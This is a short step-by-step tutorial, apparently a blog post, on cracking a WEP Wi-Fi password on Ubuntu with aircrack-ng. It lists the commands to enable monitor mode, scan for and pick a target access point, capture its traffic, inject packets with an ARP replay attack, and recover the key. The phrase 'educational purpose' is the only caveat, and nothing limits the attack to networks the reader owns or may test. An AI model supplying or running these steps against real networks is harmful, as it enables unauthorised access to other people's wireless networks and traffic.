For this purpose we are going to use Ubuntu. First we have to install air-crack program in o.s
sudo apt-get install aircrack-ng
(2) You need to go in root first. For this purpose type “su –“ and type your password.
(3)now type following command in terminal
# iwconfig wlan0 mode monitoring
Note: If some sort of error occurs type “# iwconfig” in a terminal to check for your wireless.
(4)After that it’s time to scan for a wireless network which we will compromise with educational purpose. This time we will use the command:
# airodump-ng wlan0
(5)Once you’ve found one, abort the process with Ctrl+C. Now when we have got our target it’s time to collect some information about the network. First of all copy the MAC Address of the access point which stands for BSSID (should look something like 00:15:EB:E7: …). Another thing is that we need to know the channel it’s currently working on (could see that under CH – e.g. 6). So let’s gather our information with airodump-ng.
# airodump-ng –w wep –c 6 –bssid 00:15:EB:E7: … wlan0
(6)Now we need to open another terminal in which we will use ARP Reply attack to increase the amount of data packets and gather the initializing vectors or IV of the earlier chosen Access Point.
# aireplay-ng -3 –b 00:15:EB:E7: … wlan0
(7)Let’s go to terminal 1 again and have a look at the data packets. We need to have collected over 20 000 packets. If so abort both airodump-ng and aireplay-ng.
Now we have everything required to decode the key of the wireless network. We do that with aircrack as shown below:
# aircrack-ng wep-03.cap
Then you should see that the key has been decrypted 100% successfully and the key itself.